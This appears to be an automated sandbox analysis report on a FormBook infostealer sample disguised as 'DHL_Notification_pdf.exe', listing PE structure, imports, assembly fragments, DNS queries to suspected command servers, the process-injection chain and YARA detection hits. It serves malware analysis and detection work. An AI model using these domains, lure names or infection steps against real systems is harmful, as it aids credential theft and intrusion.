                                                    mov ax, word ptr [ebp-0000012Ch]
                                                    mov ecx, dword ptr [ebp-00000112h]
                                                    sub ax, 00000053h
                                                    add ecx, FFFFFFD0h
                                                    neg ax
                                                    sbb eax, eax
                                                    mov byte ptr [ebp-26h], 00000004h
                                                    not eax
                                                    and eax, ecx
                                                    mov word ptr [ebp-2Ch], ax
                                                    cmp dword ptr [ebp-0000013Ch], 0Ah
                                                    jnc 00007FA6B0ABA0BAh
                                                    and word ptr [ebp-00000132h], 0000h
                                                    mov eax, dword ptr [ebp-00000134h]
                                                    movzx ecx, byte ptr [ebp-00000138h]
                                                    mov dword ptr [0042A318h], eax
                                                    xor eax, eax
                                                    mov ah, byte ptr [ebp-0000013Ch]
                                                    movzx eax, ax
                                                    or eax, ecx
                                                    xor ecx, ecx
                                                    mov ch, byte ptr [ebp-2Ch]
                                                    movzx ecx, cx
                                                    shl eax, 10h
                                                    or eax, ecx
                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b000 | 0xce8 | .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                    .text | 0x1000 | 0x6676 | 0x6800 | False | 0.6568134014423077 | data | 6.4174599871908855 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.141066817170598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data | 0xa000 | 0x20378 | 0x600 | False | 0.509765625 | data | 4.110582127654237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata | 0x2b000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc | 0x3b000 | 0xce8 | 0xe00 | False | 0.4224330357142857 | data | 4.238068683037627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    Name | RVA | Size | Type | Language | Country
                                                    RT_ICON | 0x3b1d8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States
                                                    RT_DIALOG | 0x3b4c0 | 0x100 | data | English | United States
                                                    RT_DIALOG | 0x3b5c0 | 0x11c | data | English | United States
                                                    RT_DIALOG | 0x3b6e0 | 0x60 | data | English | United States
                                                    RT_GROUP_ICON | 0x3b740 | 0x14 | data | English | United States
                                                    RT_VERSION | 0x3b758 | 0x24c | data | English | United States
                                                    RT_MANIFEST | 0x3b9a8 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
                                                    DLL | Import
                                                    ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                    SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                    ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                    COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                    USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                    GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                    KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                    Language of compilation system | Country where language is spoken
                                                    English | United States
                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                    03/20/23-11:29:43.795616 | UDP | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | 50513 | 53 | 192.168.2.7 | 8.8.8.8
                                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                    Mar 20, 2023 11:28:47.359352112 CET | 192.168.2.7 | 8.8.8.8 | 0x130a | Standard query (0) | www.yongleproducts.com | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:10.199090004 CET | 192.168.2.7 | 8.8.8.8 | 0xab4b | Standard query (0) | www.yongleproducts.com | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:16.961611032 CET | 192.168.2.7 | 8.8.8.8 | 0xcde2 | Standard query (0) | www.0dhy.xyz | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:22.251379967 CET | 192.168.2.7 | 8.8.8.8 | 0xf8f6 | Standard query (0) | www.kunimi.org | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:31.374200106 CET | 192.168.2.7 | 8.8.8.8 | 0x6e51 | Standard query (0) | www.amirah.cfd | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:32.418570995 CET | 192.168.2.7 | 8.8.8.8 | 0x5c46 | Standard query (0) | www.amirah.cfd | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:37.463385105 CET | 192.168.2.7 | 8.8.8.8 | 0xad3c | Standard query (0) | www.bisarropainting.com | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:38.619600058 CET | 192.168.2.7 | 8.8.8.8 | 0xd44d | Standard query (0) | www.bisarropainting.com | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:43.795615911 CET | 192.168.2.7 | 8.8.8.8 | 0x217e | Standard query (0) | www.traindic.top | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:56.792202950 CET | 192.168.2.7 | 8.8.8.8 | 0xd494 | Standard query (0) | www.bohndigitaltech.com | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:30:05.017503023 CET | 192.168.2.7 | 8.8.8.8 | 0xf4bd | Standard query (0) | www.rifleroofers.com | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:30:12.980236053 CET | 192.168.2.7 | 8.8.8.8 | 0x89bd | Standard query (0) | www.denko-kosan.com | A (IP address) | IN (0x0001) | false
                                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                    Mar 20, 2023 11:28:47.383311033 CET | 8.8.8.8 | 192.168.2.7 | 0x130a | No error (0) | www.yongleproducts.com |  | 1.13.186.125 | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:10.222804070 CET | 8.8.8.8 | 192.168.2.7 | 0xab4b | No error (0) | www.yongleproducts.com |  | 1.13.186.125 | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:16.990191936 CET | 8.8.8.8 | 192.168.2.7 | 0xcde2 | No error (0) | www.0dhy.xyz |  | 198.46.160.97 | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:22.526632071 CET | 8.8.8.8 | 192.168.2.7 | 0xf8f6 | No error (0) | www.kunimi.org | kunimi.org |  | CNAME (Canonical name) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:22.526632071 CET | 8.8.8.8 | 192.168.2.7 | 0xf8f6 | No error (0) | kunimi.org |  | 219.94.129.181 | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:31.394165993 CET | 8.8.8.8 | 192.168.2.7 | 0x6e51 | Name error (3) | www.amirah.cfd | none | none | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:32.440613031 CET | 8.8.8.8 | 192.168.2.7 | 0x5c46 | Name error (3) | www.amirah.cfd | none | none | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:37.600847006 CET | 8.8.8.8 | 192.168.2.7 | 0xad3c | Name error (3) | www.bisarropainting.com | none | none | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:38.787115097 CET | 8.8.8.8 | 192.168.2.7 | 0xd44d | Name error (3) | www.bisarropainting.com | none | none | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:43.897444963 CET | 8.8.8.8 | 192.168.2.7 | 0x217e | No error (0) | www.traindic.top |  | 162.0.231.77 | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:56.933132887 CET | 8.8.8.8 | 192.168.2.7 | 0xd494 | No error (0) | www.bohndigitaltech.com | bohndigitaltech.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                    Mar 20, 2023 11:29:56.933132887 CET | 8.8.8.8 | 192.168.2.7 | 0xd494 | No error (0) | bohndigitaltech.com |  | 162.241.24.110 | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:30:05.039990902 CET | 8.8.8.8 | 192.168.2.7 | 0xf4bd | No error (0) | www.rifleroofers.com | rifleroofers.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                    Mar 20, 2023 11:30:05.039990902 CET | 8.8.8.8 | 192.168.2.7 | 0xf4bd | No error (0) | rifleroofers.com |  | 67.222.24.48 | A (IP address) | IN (0x0001) | false
                                                    Mar 20, 2023 11:30:13.238567114 CET | 8.8.8.8 | 192.168.2.7 | 0x89bd | No error (0) | www.denko-kosan.com | denko-kosan.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                    Mar 20, 2023 11:30:13.238567114 CET | 8.8.8.8 | 192.168.2.7 | 0x89bd | No error (0) | denko-kosan.com |  | 49.212.180.95 | A (IP address) | IN (0x0001) | false
                                                    • www.0dhy.xyz
                                                    • www.kunimi.org
                                                    • www.traindic.top
                                                    • www.bohndigitaltech.com
                                                    • www.rifleroofers.com
                                                    • www.denko-kosan.com

                                                    Target ID:0
                                                    Start time:11:28:11
                                                    Start date:20/03/2023
                                                    Path:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    Imagebase:0x400000
                                                    File size:299346 bytes
                                                    MD5 hash:06F7894017E8F6737D228ADC14480C83
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low

                                                    Target ID:1
                                                    Start time:11:28:11
                                                    Start date:20/03/2023
                                                    Path:C:\Users\user\AppData\Local\Temp\ldndbi.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de
                                                    Imagebase:0x400000
                                                    File size:95744 bytes
                                                    MD5 hash:C99B9B59B44F7789DD46E5230C22A9CD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 19%, ReversingLabs
                                                    Reputation:low

                                                    Target ID:2
                                                    Start time:11:28:12
                                                    Start date:20/03/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6edaf0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:3
                                                    Start time:11:28:13
                                                    Start date:20/03/2023
                                                    Path:C:\Users\user\AppData\Local\Temp\ldndbi.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
                                                    Imagebase:0x400000
                                                    File size:95744 bytes
                                                    MD5 hash:C99B9B59B44F7789DD46E5230C22A9CD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:low

                                                    Target ID:4
                                                    Start time:11:28:18
                                                    Start date:20/03/2023
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff75ed40000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:5
                                                    Start time:11:28:31
                                                    Start date:20/03/2023
                                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                    Imagebase:0x1200000
                                                    File size:36864 bytes
                                                    MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:high

                                                    No disassembly